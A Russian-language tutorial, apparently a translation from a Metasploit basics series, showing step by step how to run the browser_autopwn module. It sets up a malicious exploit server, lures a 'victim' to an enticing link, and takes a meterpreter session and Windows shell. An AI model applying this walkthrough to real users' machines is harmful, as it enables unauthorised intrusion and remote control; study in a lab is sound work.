Содержание:
С возвращением, мои хакеры!
В этой серии, посвященной основам Metasploit, смотрим модуль, который многие начинающие хакеры считают полезным autopwn.
Обычно, когда мы пытаемся взломать целевую машину, мы хотим провести разведку, чтобы узнать о цели как можно больше. А потом, и только потом, выбираем подходящий эксплоит. Мы должны знать,какая используется операционная система, приложения, браузер, версию Java и Flash и т.д. Это утомительная и скучная, но необходимая работа. Использование Java-эксплоита после вызова эксплоита для Flash просто не сработает, и у вас могут опуститься руки.
Красота autopwn заключается в том, что он освобождает от тяжелой работы по изучению целевой машины. Сначала он попытается определить браузер жертвы, а затем начнет «забрасывать» его любыми эксплоитами, которые, по его мнению, могут сработать. Это существенно упрощает жизнь. Недостатком autopwn является то, что он очень шумный. Это может привести либо к обнаружению нас целью, либо к сбою браузера, что обычно и случается.
Давайте посмотрим на него подробнее.
Давайте запустим Kali, а затем Metasploit, выполнив в консоли команду:
kali> msfconsole
Чтобы начать работу с любым эксплоитом, обычно мы начинаем с команды ( use ). Поскольку модуль autopwn находится в auxiliary/server/browser_autopwn, то начинаем с ввода команды:
msf> use auxiliary/server/browser_autopwn
Это загрузит модуль. Затем, если нужно получить дополнительную информацию об этом модуле, можно набрать:
msf > auxiliary(browser_autopwn) > info
Как вы видите на скриншотах выше и ниже, команда info дает нам всю информацию, которая необходима для начала работы, включая описание каждого параметра и краткое описание самого модуля.
Затем, как и почти у всех модулей Metasploit, мы должны попросить его показать параметры:
msf > show options
Нам нужно определить следующие параметры:
LHOST
URIPATHLHOST>— это локальный хост. Другими словами, это наша рабочая система Kali. Поскольку наша находится по адресу 192.168.1. 106, то пишем:
msf > set LHOST 192.168.1.106
Теперь нужно создать URIPATH. Это тот URL-адрес, по которому мы хотим, чтобы эксплоиты находились на нашем вредоносном сервере. Можем назвать его чем угодно, или оставить пустым, а Metasploit заполнит этот параметр значением по умолчанию. Поскольку мы пытаемся заставить жертву кликнуть на эту ссылку, то давайте попробуем сделать ее соблазнительной, и используем имя нашего любимого сайта для хакеров, Null Byte:
msf > set URIPATH null_byte
Для начала это единственные параметры, которые нам нужно установить.
Наконец, давайте введем команду ( exploit ):
msf > exploit
Это запустит модуль autopwn. Он запускает множество серверов, а затем загружает эксплоиты, которые могут сработать против браузера целевой машины. Каждый из них представляет собой различную возможную уязвимость в целевом браузере. Будьте терпеливы, поскольку это занимает некоторое время.
В середине скриншота выше видно, что загружено 20 модулей эксплоитов.
Теперь из системы Windows 7 с Internet Explorer 9, когда цель переходит на наш веб-сервер по адресу 192.168.1.106:8080/null_byte, они получат примерно такое предупреждение от IE:
Вернемся к нашей системе Kali, autopwn обнаружил браузер и попытался определить, какой из эксплоитов будет работать.
Обратите внимание, в середине скриншота видно, что autopwn «получил ответ по 13 эксплоитам». Теперь он начнет пробовать использовать каждый из этих эксплоитов против браузера с надеждой, что по крайней мере один из них сработает.
Вернемся к нашей системе Kali и посмотрим, открылись ли какие-нибудь сессии.Наберите:
sessions -l
Когда мы это сделаем, Metasploit перечислит все активные сессии. Похоже, что у нас есть только одна.
Чтобы подключиться к сессии meterpreter, мы просто вводим:
sessions -i 1
Где 1 — идентификатор нашей сессии из предыдущей команды (видите его в крайней левой колонке?). Затем эта команда подключит нас к meterpreter, приглашение которого выглядит так:
meterpreter>
Это наше прямое соединение с машиной Windows 7. И когда мы напечатаем:
meterpreter> shell
он перебросит нас в оболочку командной строки Windows, как показано ниже.
В зависимости от браузера и его конфигурации вы можете получить несколько сессий meterpreter.Можете получить одну, точно так же, как мы описали в этой статье, а можете и вовсе не получить ни одной. В худшем случае все эксплоиты, запущенные в браузере, могут привести к падению браузера.
Хотя autopwn — хороший инструмент для обучения Metasploit, его работа слишком заметна и часто будет перегружать браузер эксплоитами, что будет приводить к его падениям. Обязательно возвращайтесь, так мы сможем исследовать всю внутреннюю работу нашего любимого инструмента хакинга Metasploit!
Ваш компьютер на Windows 10 перестал быть быстрым после обновления системы? Мы подскажем, как устранить…
Это приложение для iPhone основано на приглашениях и аудио. С его помощью можно всё равно…
Одним из самых значительных изменений в операционной системе iOS 14 является возможность менять приложения по…
В системе Android 10 появился фреймворк для пузырей чатов, популярность которым принёс Messenger. Новая система…
От загрузки в режим Fastboot при помощи одной команды до установки модов без рута, есть…
Бета-версия операционной системы Android 11 в настоящее время доступна для устройств Google Pixel. Нужно посетить…